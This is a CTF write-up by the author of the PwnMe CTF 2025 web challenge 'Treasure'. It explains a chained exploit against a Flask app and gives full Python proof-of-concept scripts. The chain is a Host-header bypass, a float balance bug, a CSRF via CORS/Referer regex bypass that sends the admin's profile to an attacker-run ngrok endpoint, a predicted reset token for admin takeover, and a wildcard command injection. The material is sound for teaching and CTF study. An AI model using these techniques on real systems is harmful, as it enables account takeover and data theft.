Skip to main content
  1. Writeups/

PwnMe CTF 2025 (final): Treasure

2768 words·13 mins·
PWNMECTF WEB HARD
Fayred
Author
Fayred
I’m French, and I’m passionate about computers in general, and computer security in particular. A CTF enthusiast and a Bug Bounty novice, I’m primarily interested in learning, having fun, and sharing what I’ve learned.
Table of Contents

Statement
#

Try registering on the “Treasure” website, which is still under construction and try to obtain an item that is normally impossible to obtain.

Author: Fayred

Treasure.zip

Overview
#

For this web challenge, here are the provided source files:

.
├── cert.pem
├── docker-compose.yml
├── Dockerfile
├── entrypoint.sh
├── key.pem
├── main.py
├── requirements.txt
└── src
    ├── admin_data_uploaded
    │   └── bf8fdd545086e4e7.json
    ├── app.py
    ├── backup.sh
    ├── blueprints
    │   ├── api.py
    │   └── render.py
    ├── bot.py
    ├── create_admin.py
    ├── models
    │   ├── inventory.py
    │   ├── reset_token.py
    │   └── user.py
    ├── static
    │   └── img
    │       └── items
    │           ├── Nothing.webp
    │           ├── The Banner of Eternal Whispers.jpeg
    │           ├── The Banner of Lost Souls.jpeg
    │           ├── The Celestial Dominion's Banner.jpeg
    │           ├── The Eternal Flame's Standard.jpeg
    │           └── Village Banner.jpeg
    ├── templates
    │   ├── admin.html
    │   ├── base.html
    │   ├── index.html
    │   ├── inventory.html
    │   ├── login.html
    │   ├── navbar.html
    │   └── register.html
    └── utils.py

9 directories, 31 files

In short, this challenge is a website built in Python using Flask. The site contains a login page and a registration page. However, the registration page seems to be accessible only from localhost. Once logged in, there is a section to drop items and an inventory section with account information. For the admin, there is a page allowing file uploads to the server and performing backups.

The flag appears to be given when a user with the user role obtains an item with the impossible rarity, as indicated in the statement or in the code of the api.py file.

api.py (L85-L86):

if item['rarity'] == 'impossible' and session.get('role') != 'admin':
    name = os.environ['FLAG']

Solution
#

To solve the challenge, it will be necessary to exploit a chain of bugs to obtain the flag. To do this, we will first need to find a way to create an account, then find a way to generate money to buy a chest. Next, it will be necessary to ATO the admin account to modify the drop rate of an item that is supposed to be impossible to obtain. Once all this is done, we simply need to drop an item on the first created account and retrieve the flag.

Code Analysis
#

Before starting to look for vulnerabilities, a quick code analysis is necessary.

app.py:

from flask import Flask
from flask_sqlalchemy import SQLAlchemy
import secrets

app = Flask(__name__)
app.config['SECRET_KEY'] = secrets.token_urlsafe(32)
app.config['SESSION_COOKIE_SAMESITE'] = 'None'
app.config['SESSION_COOKIE_SECURE'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///database.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['ADMIN_PASSWORD'] = secrets.token_hex(32)
app.config['ADMIN_UPLOAD_FOLDER'] = 'src/admin_data_uploaded'
db = SQLAlchemy(app)

from .blueprints.render import render_bp
from .blueprints.api import api_bp

app.register_blueprint(render_bp, url_prefix='/')
app.register_blueprint(api_bp, url_prefix='/api')

from src.models.user import User
from src.models.inventory import Inventory
from src.models.reset_token import ResetToken
from src.create_admin import create_admin

with app.app_context():
    db.create_all()
    create_admin(username='admin', password=app.config['ADMIN_PASSWORD'])

In the app.py file, we can see two types of endpoints: API endpoints and others. The endpoints with the / prefix are located in render.py, and the endpoints with the /api prefix are located in api.py.

Here are the available routes:

  • /
  • /login
  • /register
  • /logout
  • /inventory
  • /admin
  • /api/drop
  • /api/inventory
  • /api/profile
  • /api/backup
  • /api/upload
  • /api/report
  • /api/reset_token
  • /api/change_password

Once logged in, they are all accessible except for the routes: /register, /admin, /api/backup, and /api/reset_token. Either the endpoints are not accessible for users who are not admin, or they are not accessible for clients who are not coming from localhost. However, a bypass is possible for routes that require coming from localhost.

Creating an account without being from localhost
#

To register, we will need to bypass the localhost_required() function located in the utils.py file.

utils.py (L29-L35):

def localhost_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if request.headers.get('Host') not in ['127.0.0.1:5000', 'localhost:5000']:
            return f'Forbidden', 403
        return f(*args, **kwargs)
    return decorated_function

Here we see that the function only checks the Host header. It verifies that Host is equal to 127.0.0.1:5000 or localhost:5000.

PoC:

import requests
import warnings
from urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter("ignore", InsecureRequestWarning)

HOST = 'https://172.19.0.2:5000'

username = 'ctfplayer'
password = 'ctfplayer'

# Step 1: Sign up without being from localhost
def register(username, password):
    requests.post(HOST + '/register', 
        headers={'Host': '127.0.0.1:5000'}, # Bypass localhost_required()
        data={'username': username, 'password': password, 'password_confirmation': password}, 
        verify=False
    )
    
def login(username, password):
    login_request = requests.post(HOST + '/login',
        data={'username': username, 'password': password},
        allow_redirects=False,
        verify=False
    )
    return login_request.cookies['session']

if __name__ == '__main__':
    print(f"[+] Sign up with {username}:{password}")
    register(username, password)

    print(f"[+] Login with {username}:{password}")
    session = login(username, password)

Earning money via Business Logic Error
#

To drop an item, you need to buy a chest, and to buy a chest, you need money. However, a new user only has $20 in their account. Therefore, we need to find a way to generate money.

To do this, we need to exploit a bug located in api.py on the /api/drop route.

api.py (L45-L100):

@api_bp.route('/drop', methods=['GET', 'POST'])
@login_required
def drop():
    with open(os.environ['DROP_FILENAME'], 'r') as f:
        items = json.load(f).get('items')

    if request.method == 'GET':
        return jsonify({"chest_cost": CHEST_COST, "items": items})

    elif request.method == 'POST':
        user_id = session.get('user_id')
        balance = db.session.query(User).filter_by(id=user_id).first().balance

        data = request.get_json()
        nb = data.get('nb')

        if not nb:
            return jsonify({"error": "Missing number of chests."}), 400

        if int(nb) < 0:
            return jsonify({"error": "Cannot take less than 0."}), 400
        
        if int(nb) > 3:
            return jsonify({"error": "Cannot take more than 3."}), 400
        
        if balance < int(nb) * CHEST_COST:
            return jsonify({"error": "Not enough money."}), 400

        balance -= nb * CHEST_COST

        db.session.query(User).filter_by(id=user_id).update({'balance': balance})
        db.session.commit()

        items_dropped = drop_items(int(nb), items)

        for item in items_dropped:
            inventory_item = db.session.query(Inventory).filter_by(user_id=user_id, item_id=item['id']).first()
            if inventory_item:
                inventory_item.quantity += 1
            else:
                if item['rarity'] == 'impossible' and session.get('role') != 'admin':
                    name = os.environ['FLAG']
                else:
                    name = item['name']

                new_inventory_item = Inventory(
                    user_id=user_id,
                    item_id=item['id'],
                    name=name,
                    rarity=item['rarity'],
                    image=item['image']
                )
                db.session.add(new_inventory_item)
        db.session.commit()
        
        return jsonify({"items": items_dropped})

Here we see that nb must be between 0 and 3, and nb is converted to an integer almost everywhere. However, it is not converted to an integer in one place, which is when adjusting the balance. We also see that balance is calculated based on nb, which is problematic because it is possible to manipulate nb to generate money. Indeed, if a user sends -0.999, on the server side, we will get balance -= -0.9999 * 100, which will add approximately $100 to the account. Since the check on nb is done by truncation, -0.999 will be considered 0 during the verification.

PoC:

import requests
import warnings
from urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter("ignore", InsecureRequestWarning)

HOST = 'https://172.19.0.2:5000'

# Step 2: Business Logic Error to earn money
def earn_money(session):
    requests.post(HOST + '/api/drop', 
        cookies={'session': session}, 
        json={'nb': -0.999},
        verify=False
    )

if __name__ == '__main__':
    session = 'xxx' # your session

    print("[+] Business Logic Error to Earn money")
    earn_money(session)

CSRF via CORS Misconfiguration and bypass of the Referer check
#

To modify the drop rate of an item that is impossible to obtain, we need access to the admin account. Since there is a bot.py file, which is used to visit URLs sent to /api/report, we suspect that we need to exploit a client-side vulnerability. In api.py, we have the /api/profile route, which allows us to access the personal information of the account.

api.py (L34-41) and (L116-L139):

def cors_config(response):
    response.headers['Access-Control-Allow-Origin'] = request.headers.get('Origin', '')

    referer = urllib.parse.unquote(request.headers.get('Referer', ''))
    if re.search('^https?:\\/\\/localhost:5000\\/.*', referer, re.MULTILINE):
        response.headers['Access-Control-Allow-Credentials'] = 'true'

    return response

...

@api_bp.route('/profile', methods=['OPTIONS'])
def options_profile():
    response = make_response('', 204)
    return cors_config(response)

@api_bp.route('/profile', methods=['GET', 'POST'])
@login_required
def profile():
    if request.method == 'GET':
        user_id = session.get('user_id')
        user = db.session.query(User).filter_by(id=user_id).first()

        response = make_response(jsonify({
            'uuid': user.uuid, 
            'role': user.role, 
            'username': user.username, 
            'balance': user.balance,
        }))

        return cors_config(response)
    
    elif request.method == 'POST':
        response = make_response(jsonify({"success": "Profile updated."}))
        return cors_config(response)

In this code snippet, we see that this route is accessible via CORS from any origin, as it is reflected in the Access-Control-Allow-Origin header. However, we can see that the Access-Control-Allow-Credentials header returns true only if the Referer header matches the regex: ^https?:\/\/localhost:5000\/.*. Before going further, we need to verify that the route is accessible via a session cookie with the samesite=None flag.

app.py (L7-L8):

app.config['SESSION_COOKIE_SAMESITE'] = 'None'
app.config['SESSION_COOKIE_SECURE'] = True

We can see here that the session cookie has the samesite=None flag. Now that we know this, we need to find a way to bypass the CSRF check on this endpoint and leak the admin’s information. First, it is important to know that it is not possible to directly rewrite the Referer header in js. However, we can send a Referer that contains the path we are on, on another domain. To do this, we can use {Referrer-Policy: unsafe-url} with fetch(), which works on Chromium-based browsers but not on Firefox or Safari, for example.

Once we know this, we simply need to perform our CSRF from a path that matches the regex. However, to match the regex, it seems necessary to have a Referer that starts with http(s)://localhost:5000/. But since the multiline mode is enabled and the Referer is URL-decoded before the check, we can add a newline character in the path.

PoC:

import requests
import ngrok
from flask import Flask, request
import threading
import time
import warnings
from urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter("ignore", InsecureRequestWarning)

HOST = 'https://172.19.0.2:5000'

data = {}
csrf_end_event = threading.Event()

# Step 3: CSRF via CORS Misconfiguration with referer checker bypass 
def start_csrf_attack(session, url):
    def send_csrf():
        time.sleep(2)
        requests.post(HOST + '/api/report', 
            cookies={'session': session}, 
            json={'url': url + '/csrf'},
            verify=False
        )

    app = Flask(__name__)

    @app.route('/csrf')
    def csrf():
        return f"""
        <script>
            async function csrf(){{
                const response = await fetch("https://localhost:5000/api/profile", {{referrerPolicy: "unsafe-url", "credentials": "include"}});
                const data = await response.json();
                await fetch("{url}/exfiltration", {{
                    method: "POST",
                    headers: {{"Content-Type": "application/json"}},
                    body: JSON.stringify({{"data": data}})
                }});
            }}
            history.pushState(null, '', '%0Ahttp://localhost:5000/');
            csrf();
        </script>
        """
    
    @app.route('/exfiltration', methods=['POST'])
    def exfiltration():
        global data
        data = request.json.get('data')
        csrf_end_event.set()

        return 'Thanks!'

    threading.Thread(target=send_csrf, daemon=True).start()
    app.run(port=1337, debug=False)

if __name__ == '__main__':
    listener = ngrok.forward(1337, authtoken_from_env=True)
    url = listener.url()
    print(f"Ngrok: {url}\n")

    session = 'xxx' # your session

    print("[+] Start CSRF attack")
    threading.Thread(target=start_csrf_attack, args=(session, url), daemon=True).start()
    if csrf_end_event.wait(60):
        print(f"Data exfiltrate: {data}")

Generating a reset token via UUID leak and ATO of the admin
#

Thanks to the CSRF, we can leak the admin’s information, including uuid. This uuid is used in utils.py to generate a token.

utils.py (L37-L39):

def generate_reset_token(username, uuid):
    reset_token = hashlib.sha1(username.encode() + uuid.encode()).hexdigest()
    return reset_token

This generate_reset_token() function is used in api.py on the /api/reset_token route. We see that the reset token corresponds to the SHA1 of the concatenation of the username and the uuid. Therefore, we can predict the reset token with the uuid leak and change the admin’s password on the /api/change_password route.

api.py (L212-235):

@api_bp.route('/change_password', methods=['POST'])
@nologin_required
def change_password():
    password = request.json.get('password')
    password_confirmation = request.json.get('password_confirmation')
    token = request.json.get('token')

    if password != password_confirmation:
        return jsonify({"error": "Passwords do not match."}), 400

    reset_token = db.session.query(ResetToken).filter_by(token=token).first()

    if not reset_token:
        return jsonify({"error": "Invalid reset token."}), 400 
    
    if reset_token.is_expired():
        return jsonify({"error": "Token has expired."}), 400

    db.session.query(User).filter_by(id=reset_token.user_id).update({
        'password': generate_password_hash(password)
    })
    db.session.commit()

    return jsonify({"success": "Password changed."})

We see that we simply need to send the new password and the reset token predicted with the admin username and the uuid leak.

PoC:

import requests
import hashlib
import warnings
from urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter("ignore", InsecureRequestWarning)

HOST = 'https://172.19.0.2:5000'

username_ato = 'admin'
password = 'ctfplayer'

# Step 4: Generate reset token via UUID leak by CSRF to ATO admin account
def ato(uuid, username, password):
    requests.post(HOST + '/api/reset_token', 
        headers={'Host': '127.0.0.1:5000'}, # Bypass localhost_required()
        json={"username": username},
        verify=False
    )
    requests.post(HOST + '/api/change_password',
        json={
            "password": password,
            "password_confirmation": password,
            "token": hashlib.sha1(username.encode() + uuid.encode()).hexdigest()
        },
        verify=False
    )

if __name__ == '__main__':
    print("[+] Account Take Over")

    uuid = 'xxx' # uuid leak
    ato(uuid, username_ato, password)

Command Injection to leak the .json filename
#

Now that we are admin, we can access /admin. With this page, we can upload files to the server and perform a backup. To upload files to the server, a request is made to /api/upload, and to perform a backup, a request is made to /api/backup.

api.py (L141-150):

@api_bp.route('/backup', methods=['POST'])
@admin_required
def backup():
    t = request.json.get('time')
    if re.search(r'[A-Za-z!"#%&\'()*+,-./:;<=>@[\]^_`{|}~ \\]', t):
        return jsonify({"error": "Invalid time."}), 400

    output = os.popen(f'cd src/admin_data_uploaded && timeout {t}s ../backup.sh 2>&1').read()
    
    return jsonify({"output": output})

For the “backup” part, we can see that time is injected into os.popen(), to stop the command if it exceeds a certain time. However, this causes a Command Injection, but the only accepted characters are: ?, $ and numbers. It does not seem possible to RCE under these conditions. However, it is possible to leak the name of the .json file with the drop rates. To do this, we can use the ? wildcard, which represents exactly one character. Then we need to use $ to separate the ? and the rest.

PoC:

import requests
import re
import warnings
from urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter("ignore", InsecureRequestWarning)

HOST = 'https://172.19.0.2:5000'

# Step 5: OS Command Injection which lead to json filename leak
def os_command_injection(admin_session):
    backup_req = requests.post(HOST + '/api/backup', 
        cookies={'session': admin_session}, 
        json={"time": "?????????????????????$"},
        verify=False
    )
    filename_leak = re.search(r'[\w-]+\.json', backup_req.json()['output']).group(0)
    return filename_leak

if __name__ == '__main__':
    session_ato = 'xxx' # admin session

    print("[+] Leak .json filename")
    filename_leak = os_command_injection(session_ato)

Uploading a new .json file to obtain the impossible item
#

Now that the .json file has been leaked, we simply need to upload a file with the same name, in which we set a 100% drop rate for an item with impossible rarity.

PoC:

import requests
import io
import warnings
from urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter("ignore", InsecureRequestWarning)

HOST = 'https://172.19.0.2:5000'

# Step 6: Upload and replace the json file with item rate drop for "impossible" rarity to 100%
def upload_file(admin_session, filename):
    data = """
        {
            "items": [
                {"id": 1337, "rarity": "impossible", "name": "The Celestial Dominion's Banner", "drop_rate": 100, "image": "The Celestial Dominion's Banner.jpeg"}
            ]
        }
        """

    file = io.BytesIO(data.encode('utf-8'))

    requests.post(HOST + '/api/upload', 
        cookies={'session': admin_session},
        files={'file': (filename, file, 'application/json')},
        verify=False
    )

if __name__ == '__main__':
    filename_leak = 'xxx' # .json filename leak
    session_ato = 'xxx' # admin session

    print(f"[+] Replace '{filename_leak}' to get 100% of chance")
    upload_file(session_ato, filename_leak)

Once the file is uploaded, we simply need to return to the regular user account created earlier. Then drop an item with the money earned, to finally obtain the flag.

Exploit
#

Final PoC:

# Treasure PoC

# pip install requests flask ngrok
# export your NGROK_AUTHTOKEN before running the script

import requests
import ngrok
from flask import Flask, request
import threading
import time
import hashlib
import re
import io
import warnings
from urllib3.exceptions import InsecureRequestWarning

warnings.simplefilter("ignore", InsecureRequestWarning)

HOST = 'https://172.19.0.2:5000'

username_ato = 'admin'
username = 'ctfplayer'
password = 'ctfplayer'

data = {}
csrf_end_event = threading.Event()

# Step 1: Sign up without being from localhost
def register(username, password):
    requests.post(HOST + '/register', 
        headers={'Host': '127.0.0.1:5000'}, # Bypass localhost_required()
        data={'username': username, 'password': password, 'password_confirmation': password}, 
        verify=False
    )

def login(username, password):
    login_request = requests.post(HOST + '/login',
        data={'username': username, 'password': password},
        allow_redirects=False,
        verify=False
    )
    return login_request.cookies['session']

# Step 2: Business Logic Error to earn money
def earn_money(session):
    requests.post(HOST + '/api/drop', 
        cookies={'session': session}, 
        json={'nb': -0.999},
        verify=False
    )

# Step 3: CSRF via CORS Misconfiguration with referer checker bypass 
def start_csrf_attack(session, url):
    def send_csrf():
        time.sleep(2)
        requests.post(HOST + '/api/report', 
            cookies={'session': session}, 
            json={'url': url + '/csrf'},
            verify=False
        )

    app = Flask(__name__)

    @app.route('/csrf')
    def csrf():
        return f"""
        <script>
            async function csrf(){{
                const response = await fetch("https://localhost:5000/api/profile", {{referrerPolicy: "unsafe-url", "credentials": "include"}});
                const data = await response.json();
                await fetch("{url}/exfiltration", {{
                    method: "POST",
                    headers: {{"Content-Type": "application/json"}},
                    body: JSON.stringify({{"data": data}})
                }});
            }}
            history.pushState(null, '', '%0Ahttp://localhost:5000/');
            csrf();
        </script>
        """
    
    @app.route('/exfiltration', methods=['POST'])
    def exfiltration():
        global data
        data = request.json.get('data')
        csrf_end_event.set()

        return 'Thanks!'

    threading.Thread(target=send_csrf, daemon=True).start()
    app.run(port=1337, debug=False)

# Step 4: Generate reset token via UUID leak by CSRF to ATO admin account
def ato(uuid, username, password):
    requests.post(HOST + '/api/reset_token', 
        headers={'Host': '127.0.0.1:5000'}, # Bypass localhost_required()
        json={"username": username},
        verify=False
    )
    requests.post(HOST + '/api/change_password',
        json={
            "password": password,
            "password_confirmation": password,
            "token": hashlib.sha1(username.encode() + uuid.encode()).hexdigest()
        },
        verify=False
    )

# Step 5: OS Command Injection which lead to json filename leak
def os_command_injection(admin_session):
    backup_req = requests.post(HOST + '/api/backup', 
        cookies={'session': admin_session}, 
        json={"time": "?????????????????????$"},
        verify=False
    )
    filename_leak = re.search(r'[\w-]+\.json', backup_req.json()['output']).group(0)
    return filename_leak

# Step 6: Upload and replace the json file with item rate drop for "impossible" rarity to 100%
def upload_file(admin_session, filename):
    data = """
        {
            "items": [
                {"id": 1337, "rarity": "impossible", "name": "The Celestial Dominion's Banner", "drop_rate": 100, "image": "The Celestial Dominion's Banner.jpeg"}
            ]
        }
        """

    file = io.BytesIO(data.encode('utf-8'))

    requests.post(HOST + '/api/upload', 
        cookies={'session': admin_session},
        files={'file': (filename, file, 'application/json')},
        verify=False
    )

# Step 7: Get the flag
def get_flag(session):
    requests.post(HOST + '/api/drop', 
        cookies={'session': session}, 
        json={'nb': 1},
        verify=False
    )
    inventory_req = requests.get(HOST + '/api/inventory', 
        cookies={'session': session},
        verify=False
    )

    flag = [_ for _ in inventory_req.json() if _['rarity']== 'impossible'][0]['name']
    return flag

if __name__ == '__main__':
    listener = ngrok.forward(1337, authtoken_from_env=True)
    url = listener.url()
    print(f"Ngrok: {url}\n")

    print(f"[+] Sign up with {username}:{password}")
    register(username, password)

    print(f"[+] Login with {username}:{password}")
    session = login(username, password)

    print("[+] Business Logic Error to Earn money")
    earn_money(session)

    print("[+] Start CSRF attack")
    threading.Thread(target=start_csrf_attack, args=(session, url), daemon=True).start()
    if csrf_end_event.wait(60):
        print(f"Data exfiltrate: {data}")

        print("[+] Account Take Over")
        ato(data['uuid'], username_ato, password)

        print(f"[+] Login with {username_ato}:{password}")
        session_ato = login(username_ato, password)

        print("[+] Leak .json filename")
        filename_leak = os_command_injection(session_ato)

        print(f"[+] Replace '{filename_leak}' to get 100% of chance")
        upload_file(session_ato, filename_leak)

        print(f"[+] Get the flag from '{username}'")
        flag = get_flag(session)
        print(f"\nFlag: {flag}")

Flag: PWNME{56837e80d608e85bb886f2b4b66a47c9}

References
#

Related

PwnMe CTF 2025: sayMyName
1778 words·9 mins
PWNMECTF WEB MEDIUM
Patriot CTF 2024: Secret Door
803 words·4 mins
PATRIOT CTF WEB MEDIUM
Patriot CTF 2024: DogDay
699 words·4 mins
PATRIOT CTF WEB CRYPTO MEDIUM
GlacierCTF 2024: SkiData
1063 words·5 mins
GLACIERCTF WEB MEDIUM
HeroCTF 2024: Jinjatic
601 words·3 mins
HEROCTF WEB EZ
YesWeHack: Dojo 36
777 words·4 mins
YESWEHACK WEB